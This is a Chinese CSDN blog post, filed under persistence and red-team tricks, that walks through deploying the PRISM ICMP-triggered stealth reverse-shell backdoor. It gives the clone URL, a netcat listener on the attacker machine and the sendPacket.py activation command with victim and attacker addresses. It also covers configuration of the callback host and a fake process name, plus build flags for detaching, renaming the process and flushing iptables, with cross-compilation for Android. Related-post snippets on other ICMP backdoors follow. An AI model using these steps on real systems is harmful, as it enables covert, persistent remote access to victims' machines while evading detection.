开源工具:ICMP后门项目地址

已于 2022-02-19 19:46:42 修改
阅读量855 收藏 1
点赞数
分类专栏: # 权限维持 # 红队技巧 文章标签: linux 网络 运维
于 2022-02-19 11:17:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854790/article/details/123015544
版权

Prism backdoor添加链接描述

棱镜后门

PRISM 是一个用户空间隐身反向 shell 后门。 代码可在 GitHub 。

它已经过全面测试:

Linux
索拉里斯
艾克斯
BSD/Mac
安卓

PRISM 可以以两种不同的方式工作: ICMP 和 STATIC 模式。
ICMP 模式

使用此操作模式后门会在后台静默等待特定的 ICMP 数据包 包含要连接回来的主机/端口和防止第三方访问的私钥。

首先,在攻击者机器上运行 netcat 以等待来自后门的传入连接:

$ nc -l -p 6666

使用 sendPacket.py 脚本(或其他数据包生成器)将激活数据包发送到后门:

./sendPacket.py 192.168.0.1 p4ssw0rd 192.168.0.10 6666

192.168.0.1 是运行prism后门的受害机器
p4ssw0rd 是关键
192.168.0.10 是攻击者机器地址
6666 是攻击者机器端口

后门将连接回netcat!

静态模式

使用这种操作模式,后门会尝试连接到硬编码的 IP/PORT。
在这种情况下,只需在硬编码的机器/端口上运行 netcat 侦听:

$ nc -l -p [端口]

特征

两种操作模式(ICMP 和 STATIC)
运行时进程重命名
没有监听端口
自动 iptables 规则刷新
用纯C编写
没有库依赖

获取代码

git clone https://github.com/andreafabrizi/prism.git

配置

在构建之前,您必须配置编辑源代码的后门。
以下配置参数说明:

静态模式:
REVERSE_HOST : 连接回来的机器地址
REVERSE_PORT : 连接回来的机器端口
RESPAWN_DELAY :每个连接之间的时间,以秒为单位

ICMP 模式:
ICMP_KEY : 激活后门的密钥/密码

通用参数:
MOTD : 在后门连接处打印的消息
SHELL : 要执行的外壳
PROCESS_NAME : 假进程名
建筑

gcc <…OPTIONS…> -Wall -s -o prism prism.c

可用的 GCC 选项:
-DDETACH #后台运行进程
-DSTATIC # 启用 STATIC 模式(默认为 ICMP 模式)
-DNORENAME #不重命名进程
-DIPTABLES #尝试刷新所有iptables规则

例子:
gcc -DDETACH -DNORENAME -Wall -s -o prism prism.c
交叉编译

安卓
将外壳更改为 /system/bin/sh
apt-get install gcc-arm-linux-gnueabi
arm-linux-gnueabi-gcc -DSTATIC -DDETACH -DNORENAME -static -march=armv5 prism.c -o prism

Linux 64bit (使用 32bit 主机系统)
apt-get install libc6-dev-amd64
gcc -DDETACH -m64 -Wall -s -o prism prism.c

Linux 32bit (使用 64bit 主机系统)
apt-get install libc6-dev-i386
gcc -DDETACH -m32 -Wall -s -o prism prism.c

后门楼资料

后门忽略任何命令行参数,除了 Inf0 (最后一个字符是数字)。
此选项允许您查看有关后门的一些信息:

$ ./棱镜信息0
版本:0.5
模式:icmp
密钥:p455w0rD
进程名称:[udevd]
外壳:/bin/sh
分离:是
刷新 iptables:否

明月清风~~
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vc++实现无进程无DLL无硬盘文件无启动项的ICMP后门后门程序
尹成的技术博客
03-29 9692
客户端 #include #include #include #pragma comment(lib,"ws2_32.lib")char SendMsg[256];/* The IP header */typedef struct iphdr {unsigned int h_len:4; //4位首部长度unsigned int version:4; //IP版本号,4表示I
java 开源icmp ping_icmp的程序(ping的实现)
weixin_39986741的博客
02-28 456
code来源于《网络编程与分层协议设计》 chap7 ICMP协议程序设计----没有理解,没有编译,只是敲了出来ping.h#define ICMP_ECHOREPLY 0#define ICMP_ECHO 8#define BUFSIZE 1500#define DEFAULT_LEN 56typedef unsigned char u8;typedef unsigned ...
prism后门
weixin_34130389的博客
12-24 192
https://www.cnblogs.com/lingerhk/p/4009909.html 转载于:https://www.cnblogs.com/ming-michelle/p/10167513.html
Linux下的ICMP反弹后门:PRISM
J_linnb的博客
04-26 445
安装完解压后可以看到文件内容很简单,根据网站上的介绍可以得知它可以在Linux,Solaris,AIX,BSD/Mac,Android等多个系统运行。脚本发送包到后门主机,本地监听相关端口等待后门主机反弹连接(先开一个终端进行第一步监听,再开一个终端使用sendPacket.py脚本)使用此操作模式,后门在后台静默等待特定的 ICMP 数据包,该数据包包含要重新连接的主机/端口和防止第三方访问的私钥。比赛时遇到的这个基于ping的ICMP后门,看了很多大佬写的文章,自己决定试一下。交叉编译prism后门
IcmpBackDoor
dasfaerfgas12345的博客
08-09 151
服务端(Server.cpp): 1 #include <winsock2.h> 2 #include <stdio.h> 3 #include <urlmon.h> 4 #include <tlhelp32.h> 5 #pragma comment(lib, "Urlmon.lib") 6 #...
icmp后门的编写
liujiayu2的专栏
03-15 1864
1 关于icmp的介绍      ICMP 的全称为(Internet Control Message Protocal)。它是一种差错报告机制,可以被用来向目的主机报告或者请求各种网络信息。这些信息包括回送应答(ping),目的地不可达,源站抑制,回送请求,掩码请求和掩码应答,还有是路由跟踪等。这些信息是用ICMP数据报报头中一个字节长度的类型码来区别的。     ICMP协议有一个
Python3实现ICMP远控后门(中)之“嗅探”黑科技
七夜的博客
05-13 1309
ICMP后门 前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇   在上两篇文章中,详细讲解了ICMP协议,同时实现了一个具备完整功能的ping工具,完整的代码发布在https://github.com/qiyeboy/LuLunZi/blob/master/NetWork/ping.py中。本次讲的是嗅探,为什么要讲...
NetSeer:网络流量可视化工具-开源
05-09
它能够捕获进出系统的每一个数据包,然后分析这些包的内容,包括源IP地址、目标IP地址、端口号、传输协议(TCP、UDP或ICMP)以及数据包的大小等关键信息。这种深度包检测能力使得NetSeer能够在网络出现问题时提供...
WGPing:往返行程和数据包丢失分析工具-开源
04-13
WGPing 是一款专为网络性能监控设计的开源工具,特别适用于与MRTG(Multi Router Traffic Grapher)配合使用。这款工具的核心功能在于执行往返行程(Round-Trip Time, RTT)测量和数据包丢失分析,这对于网络故障...
SuperScanner-开源
05-03
【SuperScanner 开源项目详解】 SuperScanner是一款开源的IP与Port扫描工具,它拥有一个直观易用的GTK图形用户界面(GUI)。这个项目的核心目标是为网络安全专业人士、系统管理员以及对网络扫描感兴趣的用户提供一...
icmpdoor:用Python 3和Scapy编写的ICMP Reverse Shell(backdoorrev shell)
05-07
icmpdoor-ICMP反向外壳 icmpdoor是用Python3和scapy编写的ICMP rev shell。 已在Ubuntu 20.04,Debian 10(Kali Linux)和Windows 10上进行测试。 Python版本用法(Windows和Linux): ./icmp-cnc.py -i INTERFACE -d VICTIM-IP (Command and Control) ./icmpdoor.py -i INTERFACE -d CNC-IP (Implant) 二进制Windows版本用法版本: ./icmp-cnc.exe -d VICTIM-IP (Command and Control) ./icmpdoor.exe -d CNC-IP (Implant) 二进制Linux版本使用版本: ./icmp-cnc -d VICTIM-IP (
ectpping-开源
05-03
`ectpping` 是一个开源软件,专为以太网V2.0配置测试协议设计的命令行接口(CLI)工具。它模仿了传统的网络ping命令,但扩展了功能以适应更高级的网络配置和诊断需求,特别是针对以太网协议的特定测试场景。这个工具...
linux root icmp,linux下一个ICMP shell(backdoor)
weixin_32484447的博客
05-12 168
一、下载及安装wget http://nchc.dl.sourceforge.net/project/icmpshell/ish/v0.2/ish-v0.2.tar.gztar zxvf ish-v0.2.tar.gzcd ISHELL-v0.2/make linux最后这一步是根据操作系统类型来选择的,可选的类型有:[root@localhost ISHELL-v0.2]# make------...
Python3实现ICMP远控后门(下)之“Boss”出场
七夜的博客
05-17 832
ICMP后门   前言   第一篇:Python3实现ICMP远控后门(上) 第二篇:Python3实现ICMP远控后门(上)_补充篇 第三篇:Python3实现ICMP远控后门(中)之“嗅探”黑科技   熬到最后一篇了,本系列的Boss要出场了,实现了一个有意思的ICMP后门,暂时使用pyinstaller打包成了一个win32和64版本,如下图所示。     在前几篇的基础上,本...
探索 Go-ICMPShell:一个创新的网络工具
最新发布
gitblog_00022的博客
04-07 343
探索 Go-ICMPShell:一个创新的网络工具 项目地址:https://gitcode.com/d1nfinite/go-icmpshell 项目简介 Go-ICMPShell 是一个由 d1nfinite 开发的开源项目,它利用 ICMP(Internet Control Message Protocol)协议,提供了一种全新的远程命令执行和网络通信方式。在传统的网络安全和渗透测试中,这样...
1-11 ICMP协议
weixin_30611509的博客
01-22 112
ICMP协议 IP不提供可靠的传输服务,也不提供端到端或点到点的确认,如果出错可以通过ICMP报告来看,它在IP模块中实现。TCP/IP协议设计了ICMP就是为了弥补IP协议的不足。 它是TCP/IP协议族的一个子协议,用于在IP主机。路由器之间专递控制消息。控制消息指网络通不通,主机可以否达,路由是否可用等。这些控制消息传递的并不是用户数据,但是对用户数据的传...
ICMP后门程序原码
2195的专栏
08-31 1552
 //////////*********client.cpp***********///       #include  #include  #include    pragma comment(lib,"ws2_32.lib)   char SendMsg[256];   /* The IP header */ typedef struct iphdr { unsigned int h_len:
Bugku:分析 特殊后门
qq_26961571的博客
01-06 247
这道题提示的非常多, 那么我们就按照他说的去看,各种协议。 HTTP看到有个robots文件,会不会和之前利用robots.txt有关? IRC协议搜索出来是空白的,没有的。 DNS除了看到百度,好像也没有什么用。 最后ICMP协议,如果没有的话还要再找找了。 flag在这里, 之后每一个包这个相同位置都有一个字符,连起来就是: flag{Icmp_backdoor_can_transfer-some_infomation} ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值